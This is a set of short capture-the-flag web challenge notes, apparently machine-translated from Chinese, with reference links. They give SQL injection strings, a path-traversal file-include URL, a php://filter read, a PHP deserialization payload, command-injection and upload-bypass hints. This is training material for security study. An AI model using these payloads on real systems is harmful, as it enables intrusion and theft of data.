[ Geek challenge 2019]EasySQL

SQL Inject ( Universal password )

Single quote closure

1' or 1=1 #
The first quotation mark closes the front quotation mark , # Closed quotation marks after comments

principle ：
sql="select * from user where username=’ ‘and password=’ ’
sql="select * from user where username=’1'or 1=1 # ‘and password=’ ’

[HCTF 2018]WarmUp

PHP File contains
Verification can be bypassed by satisfying the following verification , The file contains the read file

`

  class emmm
  { public static function checkFile(&$page)
   {
        // White list list 
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        //isset() Determine whether the variable is declared is_string() Determine whether the variable is a string  && It uses logic and two values are true if The value of the inside 
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it A";
            return false;
        }
        // Check whether the value passed in matches the white list $whitelist  If so, execute true 
        if (in_array($page, $whitelist)) {
            return true;
        }
        // Function to filter question marks ( If $page The value is ？ From ? Extract the string before )
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')// return $page.? Show off in ? The first place where the number appears 
        );

         // Check whether the value passed in matches the white list for the second time $whitelist  If so, execute true 
        if (in_array($_page, $whitelist)) {
            return true;
        }
        //url Yes $page decode 
        $_page = urldecode($page);

        // Function for filtering question marks for the second time ( If $page The value is ？ From ? Extract the string before )
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        // Check whether the value passed in matches the white list for the third time $whitelist  If so, execute true 
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}`

notes ：

mb_strpos (haystack ,needle ) Returns the first occurrence of the string to find in another string 
// haystack： The string to be checked .
// needle： String to search 

mb_substr(str, start, length)  Function returns part of a string .
//str  It's necessary . From the  string  Extract substring from .
//start  It's necessary . Specify where to start the string .
//length  Optional . Specifies the length of the string to return . The default is until the end of the string .

/source.php?file=hint.php?../../../../../ffffllllaaaagggg

[ Geek challenge 2019]Havefun

[ACTF2020 Freshman competition ]Include

Reference resources ：https://blog.csdn.net/destiny1507/article/details/82347371

[ Strong net cup 2019] Note casually

https://www.cnblogs.com/wjw-zm/p/12359735.html

[SUCTF 2019]EasySQL

sql The stack
*,1
https://blog.csdn.net/weixin_44866139/article/details/105857487

[ACTF2020 Freshman competition ]Exec

Improper filtration
https://blog.csdn.net/vanarrow/article/details/108181645

[ Geek challenge 2019]Secret File

php For the agreement php://fileter ?file=php://filter/convert.base64-encode/resource=
File contains
https://www.cnblogs.com/g0udan/p/12244878.html

[ Geek challenge 2019]LoveSQL

Standard explosion library , surface , Field
https://blog.csdn.net/qq_45521281/article/details/105533626

[GXYCTF2019]Ping Ping Ping

ping;cmd Command connection , The difficulty lies in filtering the strings .

notes ：

 stay linux Of shell in IFS Express  Internal Field Separator （ Internal field separator ）

https://blog.csdn.net/sinat_34761046/article/details/114698231

[ Geek challenge 2019]Knife

Connect the kitchen knife ok

[ Geek challenge 2019]Http

View source code Or use burp This file can also be detected by scanning
Then add... According to the prompt http The request header field is OK .

https://blog.csdn.net/qq_45163122/article/details/105905864

[ Geek challenge 2019]Upload

notes ：

phtml 	 Generally, it refers to embedding php Code html file , But it will also act as php analysis 
GIF89a 	 Picture header file spoofing (https://www.cnblogs.com/hcflyy/p/3568839.html?utm_source=tuicool&utm_medium=referral)

https://blog.csdn.net/qq_45163122/article/details/105907554

[ACTF2020 Freshman competition ]Upload

Keep up with the topic . The only difference is that there is one more front end JS verification , direct F12 Verify JS Time is deleted .

[RoarCTF 2019]Easy Calc

get request , adopt php The string parsing feature bypasses , Realize information disclosure view .
https://blog.csdn.net/weixin_44077544/article/details/102630714

[ Geek challenge 2019]BabySQL

Keywords are filtered , Double writing bypasses
https://www.cnblogs.com/h3zh1/p/12548753.html

[ Geek challenge 2019]PHP

url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

php Deserialization learning ：https://blog.csdn.net/weixin_42751456/article/details/88758908
Bypass reference ：https://blog.csdn.net/weixin_44077544/article/details/103542260